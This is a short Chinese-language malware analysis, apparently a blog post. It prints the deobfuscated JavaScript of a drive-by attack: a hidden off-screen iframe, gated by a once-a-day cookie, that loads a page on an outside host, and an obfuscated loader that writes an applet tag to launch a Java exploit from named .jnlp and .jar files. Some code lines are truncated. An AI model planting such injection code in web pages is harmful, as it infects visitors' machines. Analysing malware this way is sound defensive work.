看看这里
这些工具将帮助您分析代码
这是完整的检索和未经模糊处理的代码:
function r09(){
var static = 'ajax';
var controller = 'index.php';
var r = document.createElement('iframe');
r.src = 'http://ecurie80.hostzi.com/Felenne12/clik.php';
r.style.position = 'absolute';
r.style.color = '6675';
r.style.height = '6675px';
r.style.width = '6675px';
r.style.left = '10006675';
r.style.top = '10006675';
if (!document.getElementById('r')){
document.write('
document.getElementById('r').appendChild(r);
}
}
function SetCookie(cookieName, cookieValue, nDays, path){
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0)nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name){
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))){
return null;
}
if (start == - 1)return null;
var end = document.cookie.indexOf(";", len);
if (end == - 1)end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled){
if (GetCookie('visited_uq') == 55){
}
else {
SetCookie('visited_uq', '55', '1', '/');
r09();
}
}
此代码创建一个iframe并将其推出视图
代码只使用cookie每天运行一次
http://jsunpack.jeek.org/也是许多安全研究人员使用的很棒的工具(比如Brian Krebs?)
Iframe加载Java漏洞并尝试运行它:
var FPLYKJoQG = {
WdBxtaXWsGnJRm: function (PseXOSDnXPAXRRnkHZs) {
var FIZdpsWVSgyPuFKU = document;
FIZdpsWVSgyPuFKU.write(PseXOSDnXPAXRRnkHZs);
},
wWgsxtVAofesbJwDAY: function (xPTKZBm) {
return xPTKZBm.replace(/355/g, '')
}
};
var SuOmy = FPLYKJoQG.wWgsxtVAofesbJwDAY('355Ja355355355355va355355355355355355355355');
var CHHBPE = z.vvv( SuOmy ).split(',');
var BZTlEHUaD = FPLYKJoQG.wWgsxtVAofesbJwDAY('355355355355j355355355n355355355355355355355355355355355355355355l355p355355355355355355355355355');
var ZNZXaZkfijhQTihemz = FPLYKJoQG.wWgsxtVAofesbJwDAY('355355355355355355355ap355355355355355355355355pl355355355355355355355355355355e355355355355355355t');
if (CHHBPE[1] == 7 && CHHBPE[3] > 9) {
FPLYKJoQG.WdBxtaXWsGnJRm('' + ZNZXaZkfijhQTihemz + '>');
} else {
FPLYKJoQG.WdBxtaXWsGnJRm('' + ZNZXaZkfijhQTihemz + '>');
}
加载d5xs6x0pt9tk85s.jnlp并执行它
或者如果这不可能加载gossip_usually.jar文件并加载/执行wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbj.class: